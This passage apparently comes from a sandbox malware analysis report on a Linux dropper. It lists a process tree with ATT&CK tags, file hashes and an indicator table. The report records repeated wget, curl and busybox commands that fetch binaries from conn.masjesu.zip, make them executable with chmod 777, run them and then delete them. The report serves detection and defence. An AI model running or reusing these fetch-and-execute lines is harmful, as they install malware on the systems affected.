  - File and Directory Permissions Modification
  PID:961
- /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  ./zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  2⤵
  PID:963
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - System Network Configuration Discovery
  PID:964
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - System Network Configuration Discovery
  PID:967
- /bin/chmod
  chmod 777 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  ./MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  2⤵
  PID:970
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - System Network Configuration Discovery
  PID:971
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:972
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - System Network Configuration Discovery
  PID:974
- /bin/chmod
  chmod 777 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  ./59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  - Executes dropped EXE
  PID:976
- /bin/rm
  rm 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  2⤵
  PID:977
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - System Network Configuration Discovery
  PID:978
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:979
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - System Network Configuration Discovery
  PID:981
- /bin/chmod
  chmod 777 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  ./4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  - Executes dropped EXE
  PID:983
- /bin/rm
  rm 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  2⤵
  PID:984
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - System Network Configuration Discovery
  PID:985
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:986
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - System Network Configuration Discovery
  PID:988
- /bin/chmod
  chmod 777 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - File and Directory Permissions Modification
  PID:989
- /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  ./wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  - Executes dropped EXE
  PID:990
- /bin/rm
  rm wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  2⤵
  PID:991
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  PID:992
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:993
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - System Network Configuration Discovery
  PID:995
- /bin/chmod
  chmod 777 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - File and Directory Permissions Modification
  PID:996
- /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  ./eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  - Executes dropped EXE
  PID:997
- /bin/rm
  rm eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  2⤵
  PID:998
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - System Network Configuration Discovery
  PID:999
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1000
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - System Network Configuration Discovery
  PID:1002
- /bin/chmod
  chmod 777 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - File and Directory Permissions Modification
  PID:1003
- /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  ./B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  - Executes dropped EXE
  PID:1004
- /bin/rm
  rm B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  2⤵
  PID:1005

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq	737	MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls	752	59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB	784	4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh	803	wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5	810	eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi	836	B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	857	GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	864	OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	871	g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	878	zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	885	28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi	892	TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76	899	RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi	906	zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA	913	GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA	920	OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1	927	g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7	934	zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ	941	28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi	948	TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76	955	RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi	962	zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq	969	MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls	976	59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB	983	4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh	990	wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5	997	eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi	1004	B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi